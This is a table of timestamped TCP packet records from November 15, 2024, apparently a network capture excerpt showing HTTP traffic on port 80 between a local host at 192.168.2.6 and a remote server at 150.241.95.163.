Nov 15, 2024 10:36:00.514925957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514970064 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.515129089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.515141010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.515151024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.515180111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.515201092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.534363985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534430027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534451962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534503937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534516096 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534526110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534532070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.534544945 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.534604073 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.536802053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536814928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536825895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536864042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536875963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536885023 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.536886930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536906958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536911964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.536921024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.536973953 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.537167072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.537187099 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.537198067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.537211895 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.537240982 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.567919016 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.567953110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.567965984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.567977905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568031073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568058968 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568093061 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568110943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568123102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568135023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568140030 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568149090 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568161964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568195105 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568229914 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568602085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568624020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568635941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568670988 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568835974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568881035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568907022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568912029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.568919897 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.568962097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.569196939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569216013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569238901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569245100 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.569257975 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569272041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569282055 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.569323063 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.569672108 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569684982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569695950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569708109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.569755077 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.569802999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.569962025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.570070028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.570080996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.570130110 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.591320038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591334105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591347933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591357946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591409922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591448069 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591494083 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.591526985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591542959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591548920 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.591557026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.591573000 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.591612101 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.592164040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592175007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592183113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592233896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592242956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592271090 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.592298031 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.592473984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592513084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.592531919 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.592959881 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593010902 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.593012094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593023062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593034029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593077898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.593099117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593141079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.593238115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593266010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593271971 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593308926 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.593384981 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593422890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593431950 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.593432903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.593471050 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.631285906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631300926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631372929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631378889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631386042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631392956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631642103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631656885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631665945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631690979 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.631761074 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.631879091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631895065 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631911993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.631933928 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.631962061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.632057905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632098913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632112026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632148027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632154942 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.632160902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632208109 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.632512093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632524967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632538080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.632586956 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.651433945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.651452065 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.651513100 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.651545048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.651632071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.651642084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.651654005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.651690006 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.651710987 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.653863907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.653918982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.653933048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.653947115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.653980017 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.654019117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.654067993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654093981 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654110909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654125929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654153109 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.654167891 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.654361963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654376030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654387951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.654438019 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.684941053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.684968948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.684981108 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.684993029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685010910 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685064077 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685100079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685112953 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685125113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685153961 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685192108 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685327053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685339928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685350895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685393095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685395002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685406923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685427904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685439110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685448885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.685462952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685496092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.685890913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686057091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686068058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686079025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686089993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686108112 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686146975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686261892 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686294079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686314106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686326027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686336994 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686352968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686363935 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686387062 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686671019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686681986 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686693907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686718941 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686768055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686779976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686791897 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686804056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686810017 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686815023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.686837912 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.686872005 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.708380938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708395958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708420992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708460093 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.708573103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708585978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708621979 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.708637953 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708647966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708658934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708669901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708686113 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.708715916 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.708775997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708787918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.708842993 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.709346056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.709357977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.709368944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.709394932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.709399939 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.709408998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.709430933 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.709459066 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.710166931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710176945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710201979 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710213900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710223913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710233927 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.710272074 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.710541010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710553885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710563898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710586071 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.710618019 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.710645914 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710656881 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710666895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.710689068 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.748444080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748502970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748517990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748558044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748562098 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.748575926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748616934 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.748642921 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.748698950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748730898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748744011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748755932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748766899 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.748771906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.748791933 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.748980999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749089003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749152899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749166965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749177933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749188900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749255896 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.749512911 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749526978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749540091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.749564886 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.749608994 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.768831968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.768881083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.768893003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.768963099 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.771059990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771076918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771094084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771106958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771117926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771123886 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771138906 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.771186113 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.771189928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771230936 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.771321058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771333933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771344900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771356106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771399975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.771469116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771531105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771543980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.771573067 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.802810907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.802836895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.802851915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.802860022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.802865028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.802967072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.802995920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803025961 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803039074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803070068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803081036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803199053 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803199053 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803222895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803241968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803266048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803278923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803287983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803292036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803307056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803340912 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803575039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803587914 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803600073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803653002 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803688049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803735018 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803754091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803766966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803777933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.803800106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.803988934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804001093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804013968 CET	80	49741	150.241.95.163	192.168.2.6
